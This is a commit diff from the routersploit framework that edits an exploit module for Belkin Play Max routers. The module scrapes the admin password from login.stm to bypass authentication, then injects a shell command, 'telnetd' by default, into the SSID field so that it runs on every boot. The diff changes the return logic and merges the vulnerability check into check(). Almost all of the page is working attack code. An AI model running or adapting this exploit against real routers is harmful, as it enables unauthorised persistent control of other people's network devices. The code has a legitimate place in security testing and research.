Skip to content

R
routersploit
Commit 485ceef5 by BigNerd95
Options

Minor fixes

parent 91222529
Showing with 22 additions and 23 deletions
routersploit/modules/exploits/belkin/play_max_prce.py
...@@ -17,10 +17,10 @@ class Exploit(exploits.Exploit): ...@@ -17,10 +17,10 @@ class Exploit(exploits.Exploit):
If the target is vulnerable, you can run a bash command at every boot. If the target is vulnerable, you can run a bash command at every boot.
""" """
__info__ = { __info__ = {
'name': 'Belkin Persistent Remote Command Execution', 'name': 'Belkin Play Max Persistent RCE',
'description': 'Module exploits Belkin SSID injection vuln, allowing to execute arbitrary command at every boot', 'description': 'Module exploits Belkin SSID injection vuln, allowing to execute arbitrary command at every boot',
'authors': [ 'authors': [
'BigNerd95 (Lorenzo Santina)', # vulnerability discovery and routersploit module 'BigNerd95 (Lorenzo Santina) https://github.com/bignerd95', # vulnerability discovery and routersploit module
], ],
'references': [ 'references': [
'https://bignerd95.blogspot.it/2017/02/belkin-play-max-persistent-remote.html', 'https://bignerd95.blogspot.it/2017/02/belkin-play-max-persistent-remote.html',
...@@ -35,26 +35,12 @@ class Exploit(exploits.Exploit): ...@@ -35,26 +35,12 @@ class Exploit(exploits.Exploit):
port = exploits.Option(80, 'Target Port') port = exploits.Option(80, 'Target Port')
cmd = exploits.Option('telnetd', 'Command to execute') cmd = exploits.Option('telnetd', 'Command to execute')
def check_auth_bypass(self):
url = "{}:{}/login.stm".format(self.target, self.port)
response = http_request(method="GET", url=url)
if response is None:
return False # target is not vulnerable
val = re.findall('password\s?=\s?"(.+?)"', response.text) # in some fw there are no spaces
if len(val):
return True # target vulnerable
return False # target is not vulnerable
def auth_bypass(self): def auth_bypass(self):
url = "{}:{}/login.stm".format(self.target, self.port) url = "{}:{}/login.stm".format(self.target, self.port)
response = http_request(method="GET", url=url) response = http_request(method="GET", url=url)
if response is None: if response is None:
return return False
val = re.findall('password\s?=\s?"(.+?)"', response.text) # in some fw there are no spaces val = re.findall('password\s?=\s?"(.+?)"', response.text) # in some fw there are no spaces
...@@ -64,20 +50,22 @@ class Exploit(exploits.Exploit): ...@@ -64,20 +50,22 @@ class Exploit(exploits.Exploit):
login = http_request(method="POST", url=url, data=payload) login = http_request(method="POST", url=url, data=payload)
if login is None: if login is None:
return return False
error = re.search('loginpserr.stm', login.text) error = re.search('loginpserr.stm', login.text)
if not error: if not error:
print_success("Exploit success, you are now logged in!") print_success("Exploit success, you are now logged in!")
return return True
print_error("Exploit failed. Device seems to be not vulnerable.") print_error("Exploit failed. Device seems to be not vulnerable.")
return False
def inject_command(self): def inject_command(self):
ssid_url = "{}:{}/wireless_id.stm".format(self.target, self.port) ssid_url = "{}:{}/wireless_id.stm".format(self.target, self.port)
response = http_request(method="GET", url=ssid_url) response = http_request(method="GET", url=ssid_url)
if response is None: if response is None:
print_error("Exploit failed. No response from target!")
return return
srcSSID = re.search("document\.tF\['ssid'\]\.value=\"(.*)\";", response.text) srcSSID = re.search("document\.tF\['ssid'\]\.value=\"(.*)\";", response.text)
...@@ -85,7 +73,7 @@ class Exploit(exploits.Exploit): ...@@ -85,7 +73,7 @@ class Exploit(exploits.Exploit):
SSID = srcSSID.group(1) SSID = srcSSID.group(1)
else: else:
print_error("Exploit failed. Are you logged in?") print_error("Exploit failed. Are you logged in?")
exit(1) return
if len(SSID) + 2 + len(self.cmd) > 32: if len(SSID) + 2 + len(self.cmd) > 32:
newlen = 32 - len(self.cmd) - 2 newlen = 32 - len(self.cmd) - 2
...@@ -99,6 +87,7 @@ class Exploit(exploits.Exploit): ...@@ -99,6 +87,7 @@ class Exploit(exploits.Exploit):
response = http_request(method="POST", url=url, data=payload) response = http_request(method="POST", url=url, data=payload)
if response is None: if response is None:
print_error("Exploit failed. No response from target!")
return return
err = re.search('countdown\(55\);', response.text) err = re.search('countdown\(55\);', response.text)
...@@ -106,12 +95,22 @@ class Exploit(exploits.Exploit): ...@@ -106,12 +95,22 @@ class Exploit(exploits.Exploit):
print_success("Exploit success, wait until router reboot.") print_success("Exploit success, wait until router reboot.")
else: else:
print_error("Exploit failed. Device seems to be not vulnerable.") print_error("Exploit failed. Device seems to be not vulnerable.")
exit(1)
def run(self): def run(self):
self.auth_bypass() if self.auth_bypass():
self.inject_command() self.inject_command()
@mute @mute
def check(self): def check(self):
return self.check_auth_bypass() url = "{}:{}/login.stm".format(self.target, self.port)
response = http_request(method="GET", url=url)
if response is None:
return False # target is not vulnerable
val = re.findall('password\s?=\s?"(.+?)"', response.text) # in some fw there are no spaces
if len(val):
return True # target is vulnerable
return False # target is not vulnerable
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment